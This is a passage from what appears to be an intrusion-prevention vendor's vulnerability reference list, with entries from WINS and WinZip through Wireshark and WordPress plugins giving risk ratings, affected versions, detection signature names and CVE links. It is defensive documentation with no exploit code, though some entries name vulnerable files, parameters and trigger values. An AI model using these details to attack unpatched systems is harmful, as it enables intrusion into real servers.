https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1923
MS09-039
http://technet.microsoft.com/security/bulletin/MS09-039
Back to top

WINS-Computer-Name-Validation-Buffer-Overflow

About this vulnerability: Windows Internet Naming Service (WINS) buffer overflow vulnerability via long Name value
Risk: Moderate
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Certain versions of the Windows Internet Naming Service (WINS) server do not properly validate the name field when processing requests. This allows remote attackers to cause a buffer overflow via crafted WINS packets, potentially leading to arbitrary code execution on the vulnerable machine.
Situation: WINS_WINS-Computer-Name-Validation-Buffer-Overflow
References:
CVE-2004-0567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0567
BID-11922
http://www.securityfocus.com/bid/11922
OSVDB-12370
http://www.osvdb.org/12370
MS04-045
http://technet.microsoft.com/security/bulletin/MS04-045
Back to top

WINS-Replication-Packet-System-Comromise

About this vulnerability: WINS replication packet allows system compromise
Risk: High
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows NT; Windows 2003
Software: <os>
Type: Malfunction
Description: Several versions of Microsoft Windows have a vulnerability in the handling of WINS packets. An unauthenticated remote attacker can send a special-crafted WINS replication packet, which leads to arbitrary code execution on the server.
Situation: WINS_Replication-Packet-System-Compromise
WINS_Replication-Packet-BOF-System-Compromise
References:
CVE-2004-1080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1080
BID-11763
http://www.securityfocus.com/bid/11763
OSVDB-12378
http://www.osvdb.org/12378
MS04-045
http://technet.microsoft.com/security/bulletin/MS04-045
Back to top

Wintr-Web-Project-SQL-Injection

About this vulnerability: A vulnerability in Wintr Web Project
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wintr Web Project
Type: Malfunction
Description: There is an SQL injection vulnerability in Wintr Web Project which may allow an unauthorized information disclosure and execution of arbitrary commands.
Situation: HTTP_CRL-Wintr-Web-Project-SQL-Injection
Back to top

WinVNC-Web-Server-Buffer-Overflow

About this vulnerability: A WinVNC Web Server Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1453-5242
Platform: Windows
Software: WinVNC
Type: Buffer Overflow
Description: A vulnerability in WinVNC Web Server, versions 3.3.3r7 and before, which allows remote attackers to execute arbitrary commands via a long HTTP GET request.
References:
CVE-2001-0168
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0168
BID-2306
http://www.securityfocus.com/bid/2306
OSVDB-6280
http://www.osvdb.org/6280
Back to top

Winwebsec-Botnet

About this vulnerability: Winwebsec botnet
Risk: High
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Winwebsec is a malicious botnet. Infected computers exhibit the presence of a fake antivirus software with varying product names. The monetization scheme of fake antivirus software is to spoof a user interface that resembles the interface of a legitimate antivirus product and to present arbitrary infection indicators. However, in order to presumably disinfect, the user is asked to buy a "license". While the a computer is indeed infected, the intention of the fake antivirus is typically not to disinfect the computer, even after having purchased a license. It is recommended not to buy any kind of license of the fake antivirus program. Instead, users are advised to disinfect computers with antivirus solutions of trusted origin.
Situation: HTTP_CS-Spyeye-Botnet-Request
HTTP_CRL-Winwebsec-Botnet-Request
Back to top

WinZip-CreateNewFolderFromName-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in WinZip
Risk: High
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WinZip
Type: Buffer Overflow
Description: WinZip has a stack-based buffer overflow vulnerability. A target user with a vulnerable version of the affected product can be persuaded to visit a malicious web page containing an excessively long value assigned to the CreateFolderFromName property of the FileView object. This may lead to code execution with the privileges of the currently logged in user.
Situation: HTTP_SS-WinZip-CreateNewFolderFromName-ActiveX-Control-Buffer-Overflow
File-Text_WinZip-CreateNewFolderFromName-ActiveX-Control-Buffer-Overflow
References:
CVE-2006-6884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6884
Back to top

WinZip-UUDeview-Mime-Archive-Buffer-Overrun

About this vulnerability: A vulnerability in WinZip
Risk: High
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WinZip
Type: Buffer Overflow
Description: A buffer overrun exists in WinZip.exe MIME parsing routines provided by the UUDeview component. This vulnerability can be triggered to cause WinZip to prematurely terminate or possibly execute arbitrary code by sending a specially crafted MIME message.
Situation: File-Text_WinZip-UUDeview-Mime-Archive-Buffer-Overrun
References:
BID-9758
http://www.securityfocus.com/bid/9758
Back to top

Wireshark-Bluetooth-SDP-Dissector-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Wireshark.
Risk: High
First detected in: sgpkg-ips-1455-5242
Last changed: sgpkg-ips-1455-5242
Platform: Windows; Unix; Linux
Software: Wireshark
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability in Wireshark, versions 3.2.x prior to 3.2.18 and 3.4.x prior to 3.4.10, which allows remote attackers to execute arbitrary code by enticing a user to open a packet trace file or sending an SDP PDU through a sniffed connection with a crafted continuation state length, due to the insufficient input validation while parsing Bluetooth SDP protocol traffic.
Situation: Generic_UDP-Wireshark-Bluetooth-SDP-Dissector-Heap-Buffer-Overflow
References:
CVE-2021-39925
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39925
Back to top

Wireshark-Capwap-Dissector-Denial-Of-Service

About this vulnerability: A Wireshark Capwap Dissector Denial Of Service vulnerability.
Risk: High
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wireshark
Type: Configuration Error
Description: A vulnerability in Wireshark, versions 1.6.x before 1.6.16 and 1.8.x before 1.8.8, which allows remote attackers to cause a denial of service condition via a crafted packet, due to the incorrect use of a -1 to represent an error condition.
Situation: Generic_UDP-Wireshark-Capwap-Dissector-Denial-Of-Service
References:
CVE-2013-4074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4074
BID-60500
http://www.securityfocus.com/bid/60500
OSVDB-94091
http://www.osvdb.org/94091
Back to top

Wireshark-CLDAP-Dissector-DOS

About this vulnerability: A Wireshark CLDAP Dissector DOS vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wireshark
Type: Input Validation
Description: A vulnerability in Wireshark, versions 1.0.x, 1.2.0 through 1.2.14, and 1.4.0 through 1.4.3, which allows remote attackers to cause a denial of service condition via a crafted SMB or connectionless LDAP packet.
Situation: LDAP-UDP_CS-Wireshark-CLDAP-Dissector-DOS
References:
CVE-2011-1140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1140
OSVDB-71552
http://www.osvdb.org/71552
Back to top

Wireshark-Insecure-Search-Path-Script-Execution

About this vulnerability: A vulnerability in Wireshark Foundation Wireshark
Risk: Moderate
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wireshark
Type: Malfunction
Description: There is an insecure search path vulnerability in Wireshark. The vulnerability can be exploited when opening a pcap or capture file, the application searches for a script 'console.lua' from the same directory that the pcap was found. A remote attacker could exploit this vulnerability by enticing a user to open a pcap file from a remote WebDAV or SMB share. Successful exploitation could allow an attacker to execute an arbitrary lua script in the context of the user running Wireshark.
Situation: HTTP_CSU-Wireshark-Insecure-Search-Path-Script-Execution
SMB-TCP_CHS_Wireshark-Insecure-Search-Path-Script-Execution
References:
CVE-2011-3360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3360
OSVDB-75347
http://www.osvdb.org/75347
Back to top

Wireshark-LWRES-Dissector-Stack-Based-Buffer-Overflow

About this vulnerability: Wireshark LWRES Dissector Stack Based Buffer Overflow
Risk: High
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows;Mac OS X;Linux
Software: Wireshark
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5, via the LWRES Dissector dissect_getaddrsbyname_request function, which allows remote attackers to execute arbitrary code or cause a denial of service condition.
Situation: Generic_UDP-Wireshark-LWRES-Dissector-Stack-Based-Buffer-Overflow
References:
CVE-2010-0304
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0304
BID-37985
http://www.securityfocus.com/bid/37985
OSVDB-61987
http://www.osvdb.org/61987
Back to top

Wireshark-Netscreen-Dissector-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Wireshark
Risk: High
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Platform: Generic
Software: Wireshark
Type: Malfunction
Description: A heap-based buffer overflow vulnerability has been reported in Wireshark. This vulnerability is due to improper input validation when handling NetScreen packet capture files. A remote attacker could exploit this vulnerability by enticing a victim to open a crafted file. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the current process.
Situation: File-Text_Wireshark-Netscreen-Dissector-Heap-Based-Buffer-Overflow
File-Binary_Wireshark-Netscreen-Dissector-Heap-Based-Buffer-Overflow
References:
CVE-2023-6175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6175
Back to top

Wireshark-SigComp-Buffer-Overflow-Vulnerability

About this vulnerability: Wireshark SigComp Buffer Overflow Vulnerability.
Risk: High
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wireshark
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Wireshark, versions 0.10.8 through 1.0.13 and 1.2.0 through 1.2.8, in the SigComp Universal Decompressor Virtual Machine dissector.
Situation: SIP-UDP_Wireshark-SigComp-Buffer-Overflow-Vulnerability
References:
CVE-2010-2287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2287
BID-40728
http://www.securityfocus.com/bid/40728
Back to top

WMF-Microsoft-Windows-WMF-Header-Filesize-Buffer-Overflow

About this vulnerability: WMF header parsing vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-61-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows ME
Software: <os>
Type: Buffer Overflow
Description: Certain versions of Microsoft Windows contain a component that does not parse placeable WMF images correctly. A placeable WMF image with the FileSize value in the header set in the range 0x00000000-0x00000008 or 0x80000000-0x80000008 triggers an integer underflow, which later leads to a buffer overflow. Arbitrary remote code execution is possible via a successfull exploit. Internet Explorer uses the vulnerable component to parse WMF images, which allows malicious web pages to easily exploit visitors using the browser.
Situation: HTTP_WMF-Microsoft-Windows-WMF-Header-Filesize-Buffer-Overflow
File-Binary_WMF-Microsoft-Windows-WMF-Header-Filesize-Buffer-Overflow
References:
CVE-2006-0020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0020
BID-16516
http://www.securityfocus.com/bid/16516
OSVDB-22976
http://www.osvdb.org/22976
MS06-004
http://technet.microsoft.com/security/bulletin/MS06-004
Back to top

WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution

About this vulnerability: Windows Graphics Render Engine arbitrary code execution vulnerability
Risk: Critical
First detected in: sgpkg-ips-50-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Microsoft Windows Graphics Render Engine has an buffer overflow vulnerability in the code rendering WMF (Windows Metafile Format) images. The vulnerability allows arbitrary code execution when a malicious WMF file is opened with the vulnerable Windows component.
Situation: HTTP_WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
HTTP_WMF-Metasploit-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
E-Mail_BS-WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
E-Mail_BS-WMF-Metasploit-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
FTP_DL-WMF-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
FTP_DL-WMF-Metasploit-Windows-Graphics-Render-Engine-Arbitrary-Code-Execution
File-Binary_Microsoft-Windows-WMF-Graphics-Render-Engine-Code-Execution-2
File-Binary_Microsoft-Windows-WMF-Graphics-Render-Engine-Code-Execution
References:
CVE-2005-4560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4560
BID-16074
http://www.securityfocus.com/bid/16074
MS06-001
http://technet.microsoft.com/security/bulletin/MS06-001
Back to top

WMF-Windows-Metafile-Vulnerability-MS05-053

About this vulnerability: Windows parses WMF files incorrectly, allowing denial of service attacks
Risk: High
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: WMF, Microsoft Windows Metafile Format, is an image format used to store both bitmap and vector formatted graphics data. Large, crafted values in a WMF file's header can cause a denial of service situation on certain versions of Windows.
Situation: HTTP_Windows-Metafile-Vulnerability-MS05-053
File-Binary_Microsoft-Windows-Metafile-Vulnerability-MS05-053
References:
CVE-2005-2124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2124
BID-15352
http://www.securityfocus.com/bid/15352
MS05-053
http://technet.microsoft.com/security/bulletin/MS05-053
Back to top

Wnad

About this vulnerability: WNAD
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WNAD
Type: Misconfiguration
Description: WNAD is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Wnad
Back to top

Wolfssl-Dopresharedkeys-Psk-Identity-Buffer-Overflow

About this vulnerability: A vulnerability in wolfSSL
Risk: Moderate
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: wolfSSL
Type: Input Validation
Description: There has been reported a buffer overflow vulnerability in wolfSSL embedded SSL/TLS library. This vulnerability could be exploited remotely. Successful exploitation might lead in arbitrary code execution.
Situation: TLS_CS-Wolfssl-Dopresharedkeys-Psk-Identity-Buffer-Overflow
References:
CVE-2019-11873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11873
Back to top

Word-RTF-Listoverridecount-RCE-CVE-2012-2539

About this vulnerability: A vulnerability in Microsoft Word
Risk: Moderate
First detected in: sgpkg-ips-497-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Malfunction
Description: An attempt to exploit vulnerability in Microsoft Word was detected
Situation: File-Text_Word-RTF-Listoverridecount-RCE-Multiple-Vulnerabilities
File-RTF_Word-RTF-Listoverridecount-RCE-Multiple-Vulnerabilities
References:
CVE-2012-2539
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2539
MS12-077
http://technet.microsoft.com/security/bulletin/MS12-077
Back to top

Wordpress-10Web-Photo-Gallery-Plugin-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress 10Web Photo Gallery Plugin
Risk: High
First detected in: sgpkg-ips-1233-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress 10Web Photo Gallery Plugin
Type: Cross-site Scripting
Description: There exists a vulnerability in the WordPress 10Web Photo Gallery Plugin, versions before 1.5.46, which allows remote attackers to execute arbitrary code by crafting malicious image titles and descriptions, due to insufficient sanitization of user input during image metadata editing.
Situation: HTTP_CRL-Wordpress-10Web-Photo-Gallery-Plugin-Cross-Site-Scripting
References:
CVE-2020-9335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9335
Back to top

Wordpress-10Web-Photo-Gallery-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project 10Web Photo Gallery
Risk: High
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress 10Web Photo Gallery Plugin
Type: Input Validation
Description: An SQL injection vulnerability has been reported in 10Web Photo Gallery Plugin for WordPress. The vulnerability is due to insufficient sanitization of user input. A remote, unauthenticated attacker could exploit this vulnerability by crafting a malicious request to the target server. Successful exploitation could result in execution of arbitrary SQL commands against the database on the target server.
Situation: HTTP_CSU-Wordpress-10Web-Photo-Gallery-SQL-Injection
Back to top

Wordpress-Admin-API-Directory-Traversal

About this vulnerability: A vulnerability in WordPress Project WordPress
Risk: Moderate
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Incorrect parameter validation causes a directory traversal vulnerability in Wordpress. A successful exploit allows an attacker to cause a denial of service condition.
Situation: HTTP_CRL-Wordpress-Admin-API-Directory-Traversal
References:
CVE-2016-6896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6896
Back to top

Wordpress-Advanced-Custom-Fields-Plugin-Post_Status-Reflected-XSS

About this vulnerability: A vulnerability in WordPress Project Advanced Custom Fields Plugin
Risk: Moderate
First detected in: sgpkg-ips-1596-5242
Last changed: sgpkg-ips-1596-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Lack of validation on the post_status parameter in the Custom Fields Plugin for WordPress causes a cross-site scripting vulnerability. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Wordpress-Advanced-Custom-Fields-Plugin-Post_Status-Reflected-Cross-Site-Scripting
References:
CVE-2023-30777
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30777
Back to top

Wordpress-AIT-CSV-Import-Export-Unauthenticated-RCE

About this vulnerability: An attempt to exploit a vulnerability in Wordpress AIT CSV Import/Export plugin
Risk: High
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Platform: Generic
Software: Wordpress AIT CSV Import Export plugin
Type: Malfunction
Description: There exists a vulberability in Wordpress AIT CSV Import/Export plugin, versions 3.0.3 and before, which allows remote attackers to execute arbitrary PHP code by uploading a PHP file to ait-csv-import-export/admin/upload-handler.php which has no content type validation.
Situation: HTTP_CS-Wordpress-AIT-CSV-Import-Export-Unauthenticated-RCE
Back to top

Wordpress-All-In-One-Wp-Migration-Plugin-Backups-Directory-Traversal

About this vulnerability: A vulnerability in WordPress Project All-in-One WP Migration
Risk: Moderate
First detected in: sgpkg-ips-1471-5242
Last changed: sgpkg-ips-1471-5242
Platform: Generic
Software: WordPress
Type: Directory Traversal
Description: Insufficient sanitization of user-supplied data in class-ai1wm-backups.php causes a vulnerability in the All-in-One WP Migration plugin of WordPress. A successful exploit may allow an attacker to delete arbitray files on the target system and cause a denial of service condition.
Situation: HTTP_CRL-Wordpress-All-In-One-Wp-Migration-Plugin-Backups-Directory-Traversal
References:
CVE-2022-1476
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1476
Back to top

Wordpress-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Wordpress
Risk: High
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress
Type: Directory Traversal
Description: A vulnerability in WordPress which allows remote attackers to execute arbitrary code and take over the WordPress site due to lack of proper permissions over critical files.
Situation: HTTP_CRL-Wordpress-Arbitrary-File-Deletion
Back to top

Wordpress-Automatic-Plugin-SQL-Injection-CVE-2024-27956

About this vulnerability: A vulnerability in WordPress Automatic plugin
Risk: High
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: An SQL injection vulnerability has been reported in WordPress Automatic plugin versions through 3.92.0. A remote, unauthenticated attacker can use this vulnerability to execute arbitrary SQL queries.
Situation: HTTP_CRL-Wordpress-Automatic-Plugin-SQL-Injection-CVE-2024-27956
References:
CVE-2024-27956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27956
Back to top

Wordpress-AYS-Popup-Box-Plugin-Class-AYS-Pb-Admin-Reflected-XSS

About this vulnerability: A vulnerability in WordPress Project AYS Popup Box
Risk: Moderate
First detected in: sgpkg-ips-1648-5242
Last changed: sgpkg-ips-1648-5242
Platform: Generic
Software: WordPress Project AYS Popup Box
Type: Input Validation
Description: Improper input validation of the upgrade_plugin parameter in class-ays-pb-admin.php causes a cross-site scripting vulnerability in WordPress AYS Popup Box. A succesful exploit allows an attacker to execute arbitrary scriptes in a user's browser.
Situation: HTTP_CRL-Wordpress-AYS-Popup-Box-Plugin-Class-AYS-Pb-Admin-Reflected-XSS
References:
CVE-2023-4137
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4137
Back to top

Wordpress-Backup-Migration-Plugin-Ajax.php-Url-Command-Injection

About this vulnerability: An attempt to exploit a vulnerability in the WordPress plugin Backup Migration detected.
Risk: High
First detected in: sgpkg-ips-1692-5242
Last changed: sgpkg-ips-1692-5242
Platform: Generic
Software: WordPress Backup Migration Plugin
Type: Input Validation
Description: A vulnerability in the WordPress plugin Backup Migration, versions prior to 1.4.0, which allows remote attackers to execute arbitrary OS commands by sending crafted requests to the target server, due to the improper input validation in ajax.php.
Situation: HTTP_CS-Wordpress-Backup-Migration-Plugin-Ajax.php-Url-Command-Injection
References:
CVE-2023-7002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7002
Back to top

Wordpress-Backup-Migration-Plugin-Backup-heart.php-Remote-Code-Execution

About this vulnerability: A vulnerability in WordPress Backup Migration Plugin
Risk: High
First detected in: sgpkg-ips-1675-5242
Last changed: sgpkg-ips-1675-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A remote code execution vulnerability has been reported in the WordPress plugin Backup Migration. This vulnerability is due to improper input validation in backup-heart.php. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in the execution of arbitrary PHP code.
Situation: HTTP_CS-Wordpress-Backup-Migration-Plugin-Backup-heart.php-Remote-Code-Execution
HTTP_CS-Wordpress-Backup-Migration-Plugin-Backup-heart.php-Possible-File-Inclusion
References:
CVE-2023-6553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6553
Back to top

Wordpress-Backuply-Plugin-Options-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project Backuply Plugin
Risk: Moderate
First detected in: sgpkg-ips-1786-5242
Last changed: sgpkg-ips-1786-5242
Platform: Generic
Software: WordPress Project Backuply Plugin
Type: Input Validation
Description: Improper input validation of the "options[...]" parameters in the backuply_wp_clone_sql function causes an SQL injection vulnerability in the Backuply plugin for WordPress. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Wordpress-Backuply-Plugin-Options-SQL-Injection
References:
CVE-2024-8669
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8669
Back to top

Wordpress-Beautiful-Cookie-Consent-Banner-Plugin-CVE-2023-3388-Stored-XSS

About this vulnerability: A vulnerability in WordPress Project Beautiful Cookie Consent Banner Plugin
Risk: High
First detected in: sgpkg-ips-1610-5242
Last changed: sgpkg-ips-1610-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for the WordPress plugin Beautiful Cookie Consent Banner. This vulnerability is due to improper input validation for the nsc_bar_content_href parameter. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CRL-Wordpress-Beautiful-Cookie-Consent-Banner-Plugin-CVE-2023-3388-Stored-XSS
References:
CVE-2023-3388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3388
Back to top

Wordpress-Better-Search-Replace-Plugin-Insecure-Deserialization

About this vulnerability: A vulnerability in WordPress Better Search Replace plugin
Risk: High
First detected in: sgpkg-ips-1701-5242
Last changed: sgpkg-ips-1701-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported for the WordPress Better Search Replace Plugin. This vulnerability is due to improper input validation in the class-bsr-db.php file. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in remote code execution.
Situation: HTTP_CRL-Wordpress-Better-Search-Replace-Plugin-Insecure-Deserialization
HTTP_CRL-Wordpress-Better-Search-Replace-Plugin-Potential-Insecure-Deserialization
References:
CVE-2023-6933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6933
Back to top

Wordpress-BookingPress-SQLi

About this vulnerability: A vulnerability in the Wordpress BookingPress Plugin.
Risk: High
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1552-5242
Platform: Generic
Software: WordPress BookingPress Plugin
Type: Input Validation
Description: A vulnerability in the the Wordpress BookingPress Plugin, versions before 1.0.11, which allows remote attackers to execute arbitrary SQL queries via the "total_service" parameter.
Situation: HTTP_CRL-Wordpress-BookingPress-SQLi
References:
CVE-2022-0739
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0739
Back to top

Wordpress-BulletProof-Security-Backup-Disclosure

About this vulnerability: A vulnerability in the Wordpress BulletProof Security plugin.
Risk: High
First detected in: sgpkg-ips-1430-5242
Last changed: sgpkg-ips-1430-5242
Platform: Generic
Software: Wordpress BulletProof Security
Type: Malfunction
Description: A vulnerability in the Wordpress BulletProof Security plugin, versions 5.1 and before, which allows remote attackers access to all user credentials by allowing public access to db_backup_log.txt and it's directory.
Situation: HTTP_CSU-Wordpress-BulletProof-Security-Backup-Disclosure
References:
CVE-2021-39327
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39327
Back to top

Wordpress-C-Library-Gethostbyname-Buffer-Overflow

About this vulnerability: A vulnerability in GNU C Library
Risk: High
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: glibc
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in GNU C Library (glibc) __nss_hostname_digits_dots() function which is accessible from gethostbyname*() functions. The function can overflow sizeof(*char) bytes, 4 or 8 for 32-bit or 64-bit architectures, respectively. A remote attacker can exploit this vulnerability by providing crafted input to an application that uses a gethostbyname function with user controlled input; the exact mechanism will depend on the application using the vulnerable function. Successful exploitation could result in code execution in the context of the affected application. This vulnerability is commonly referred to as 'GHOST'.
Situation: HTTP_CRL-Wordpress-C-Library-Gethostbyname-Buffer-Overflow
References:
CVE-2015-0235
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235
BID-72325
http://www.securityfocus.com/bid/72325
OSVDB-117579
http://www.osvdb.org/117579
Back to top

Wordpress-Calculated-Fields-Form-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Project Calculated Fields Form plugin
Risk: Moderate
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Insufficient input validation in the Calculated Fields Form plugin of WordPress causes a cross-site scripting vulnerability that allows an attacker to execute arbitrary script in the user's browser.
Situation: HTTP_CRL-Wordpress-Calculated-Fields-Form-Cross-Site-Scripting
References:
CVE-2020-7228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7228
Back to top

Wordpress-Comment-Content-Filter-Remote-Code-Execution

About this vulnerability: A vulnerability in WordPress Project WordPress
Risk: Moderate
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: WordPress lacks proper protection for cross-site request forgery when processsing comment content in the wp_rel_nofollow_callback function. The vulnerability can be exploited to execute arbitrary PHP code on the target.
Situation: File-Text_Wordpress-Comment-Content-Filter-Remote-Code-Execution
References:
CVE-2019-9787
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
Back to top

Wordpress-Comments-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress
Risk: High
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-1583-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in Wordpress. The vulnerability is due to insufficient validation of comments. By convincing a user to visit a malicious website, a remote attacker can exploit the XSS vulnerability to execute arbitrary script in the user's browser session or gain access to sensitive information. If an administrator is enticed, then arbitrary command execution on the server is possible.
Situation: HTTP_CRL-Wordpress-Comments-Stored-Cross-Site-Scripting
References:
CVE-2015-3440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3440
OSVDB-121320
http://www.osvdb.org/121320
Back to top

Wordpress-Compfight-1.4-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress
Risk: Moderate
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: There exists a cross-site scripting vulnerability in WordPress compfight.php. The vulnerability is due to lack of sanitization of data supplied in the search-value parameter. Remote authenticated attackers can exploit this vulnerability to execute arbitrary HTML and script code in the users' browser sessions in the context of the vulnerable web site.
Situation: HTTP_CRL-Wordpress-Compfight-1.4-Cross-Site-Scripting
References:
CVE-2014-5202
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5202
Back to top

Wordpress-Contact-Form-Entries-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Contact Form Entries Plugin
Risk: High
First detected in: sgpkg-ips-1439-5242
Last changed: sgpkg-ips-1439-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in the Wordpress Contact Form Entries plugin. The vulnerability is due to insufficient sanitization of HTTP headers. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP request to the target server. Successful exploitation could result in the execution of arbitrary script code in the target user's browser.
